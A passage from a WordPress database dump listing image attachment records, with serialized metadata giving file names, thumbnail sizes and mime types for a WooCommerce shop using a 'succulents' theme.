;s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"product2-gallery2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"product2-gallery2-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"product2-gallery2-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"product2-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"product2-gallery2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(606,754,'_wp_attachment_image_alt','a'),(607,764,'_wp_attachment_image_alt','a'),(608,774,'_wp_attachment_image_alt','o'),(609,2135,'_wp_attachment_image_alt','a'),(610,2139,'_wp_attachment_image_alt','a'),(611,1472,'_wp_attachment_image_alt','o'),(612,1473,'_wp_attachment_image_alt','a'),(613,1492,'_wp_attachment_image_alt','o'),(614,798,'_wp_attached_file','2018/01/h5-img-1.jpg'),(615,798,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:655;s:4:\"file\";s:20:\"2018/01/h5-img-1.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h5-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"h5-img-1-600x205.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:205;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h5-img-1-300x102.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:102;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"h5-img-1-1024x349.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:349;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"h5-img-1-768x262.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:262;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h5-img-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h5-img-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:21:\"h5-img-1-1536x524.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:524;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"h5-img-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:21:\"h5-img-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:20:\"h5-img-1-550x655.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:655;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:21:\"h5-img-1-1100x655.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:655;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h5-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"h5-img-1-600x205.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:205;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(616,1496,'_wp_attached_file','2018/01/h8-img-5.png'),(617,1496,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:157;s:6:\"height\";i:90;s:4:\"file\";s:20:\"2018/01/h8-img-5.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"h8-img-5-100x90.png\";s:5:\"width\";i:100;s:6:\"height\";i:90;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"h8-img-5-150x90.png\";s:5:\"width\";i:150;s:6:\"height\";i:90;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"h8-img-5-100x90.png\";s:5:\"width\";i:100;s:6:\"height\";i:90;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(618,2168,'_wp_attached_file','2018/01/product-1.jpg'),(619,2168,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:21:\"2018/01/product-1.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"product-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"product-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"product-1-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"product-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"product-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"product-1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"product-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"product-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:21:\"product-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:21:\"product-1-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"product-1-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"product-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"product-1-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"product-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(620,1496,'_wp_attachment_image_alt','o'),(621,4208,'_wp_attachment_image_alt',''),(622,2139,'_wp_attachment_image_alt','a'),(623,2168,'_wp_attachment_image_alt','a'),(624,764,'_wp_attachment_image_alt','a'),(625,774,'_wp_attachment_image_alt','o'),(626,798,'_wp_attachment_image_alt','o'),(627,4211,'_wp_attached_file','2018/03/landing-home12-img1.jpg'),(628,4211,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:472;s:4:\"file\";s:31:\"2018/03/landing-home12-img1.jpg\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"landing-home12-img1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-home12-img1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"landing-home12-img1-600x354.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:354;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"landing-home12-img1-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-home12-img1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"landing-home12-img1-768x453.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:453;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"landing-home12-img1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"landing-home12-img1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"landing-home12-img1-550x472.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:472;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:31:\"landing-home12-img1-550x472.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:472;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"landing-home12-img1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"landing-home12-img1-600x354.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:354;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-home12-img1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(629,1497,'_wp_attached_file','2018/01/h8-img-6.png'),(630,1497,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:90;s:6:\"height\";i:90;s:4:\"file\";s:20:\"2018/01/h8-img-6.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(631,1156,'_wp_attachment_image_alt','q'),(632,1157,'_wp_attachment_image_alt','q'),(633,2169,'_wp_attached_file','2018/01/product-2.jpg'),(634,2169,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:21:\"2018/01/product-2.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"product-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"product-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"product-2-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"product-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"product-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"product-2-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"product-2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"product-2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:21:\"product-2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:21:\"product-2-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"product-2-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"product-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"product-2-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"product-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(635,811,'_wp_attached_file','2018/01/h5-video-button.jpg'),(636,811,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:473;s:6:\"height\";i:301;s:4:\"file\";s:27:\"2018/01/h5-video-button.jpg\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"h5-video-button-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"h5-video-button-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"h5-video-button-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"h5-video-button-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:27:\"h5-video-button-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:27:\"h5-video-button-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"h5-video-button-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(637,1498,'_wp_attached_file','2018/01/h8-img-7.png'),(638,1498,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:101;s:6:\"height\";i:90;s:4:\"file\";s:20:\"2018/01/h8-img-7.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(639,1498,'_wp_attachment_image_alt','o'),(640,1158,'_wp_attached_file','2018/01/product2-gallery3.jpg'),(641,1158,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2018/01/product2-gallery3.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"product2-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"product2-gallery3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"product2-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"product2-gallery3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"product2-gallery3-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"product2-gallery3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"product2-gallery3-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"product2-gallery3-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"product2-gallery3-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"product2-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"product2-gallery3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(642,1520,'_wp_attached_file','2018/01/h7-img-1.jpg'),(643,1520,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:821;s:4:\"file\";s:20:\"2018/01/h7-img-1.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h7-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h7-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h7-img-1-219x300.jpg\";s:5:\"width\";i:219;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h7-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h7-img-1-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h7-img-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"h7-img-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:20:\"h7-img-1-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:20:\"h7-img-1-550x821.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:821;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h7-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h7-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(644,4209,'_wp_attachment_image_alt',''),(645,4211,'_wp_attachment_image_alt','a'),(646,811,'_wp_attachment_image_alt','o'),(647,1157,'_wp_attachment_image_alt','q'),(648,1158,'_wp_attachment_image_alt','q'),(649,4225,'_wp_attached_file','2018/03/h1-slide1.png'),(650,4225,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:399;s:6:\"height\";i:399;s:4:\"file\";s:21:\"2018/03/h1-slide1.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h1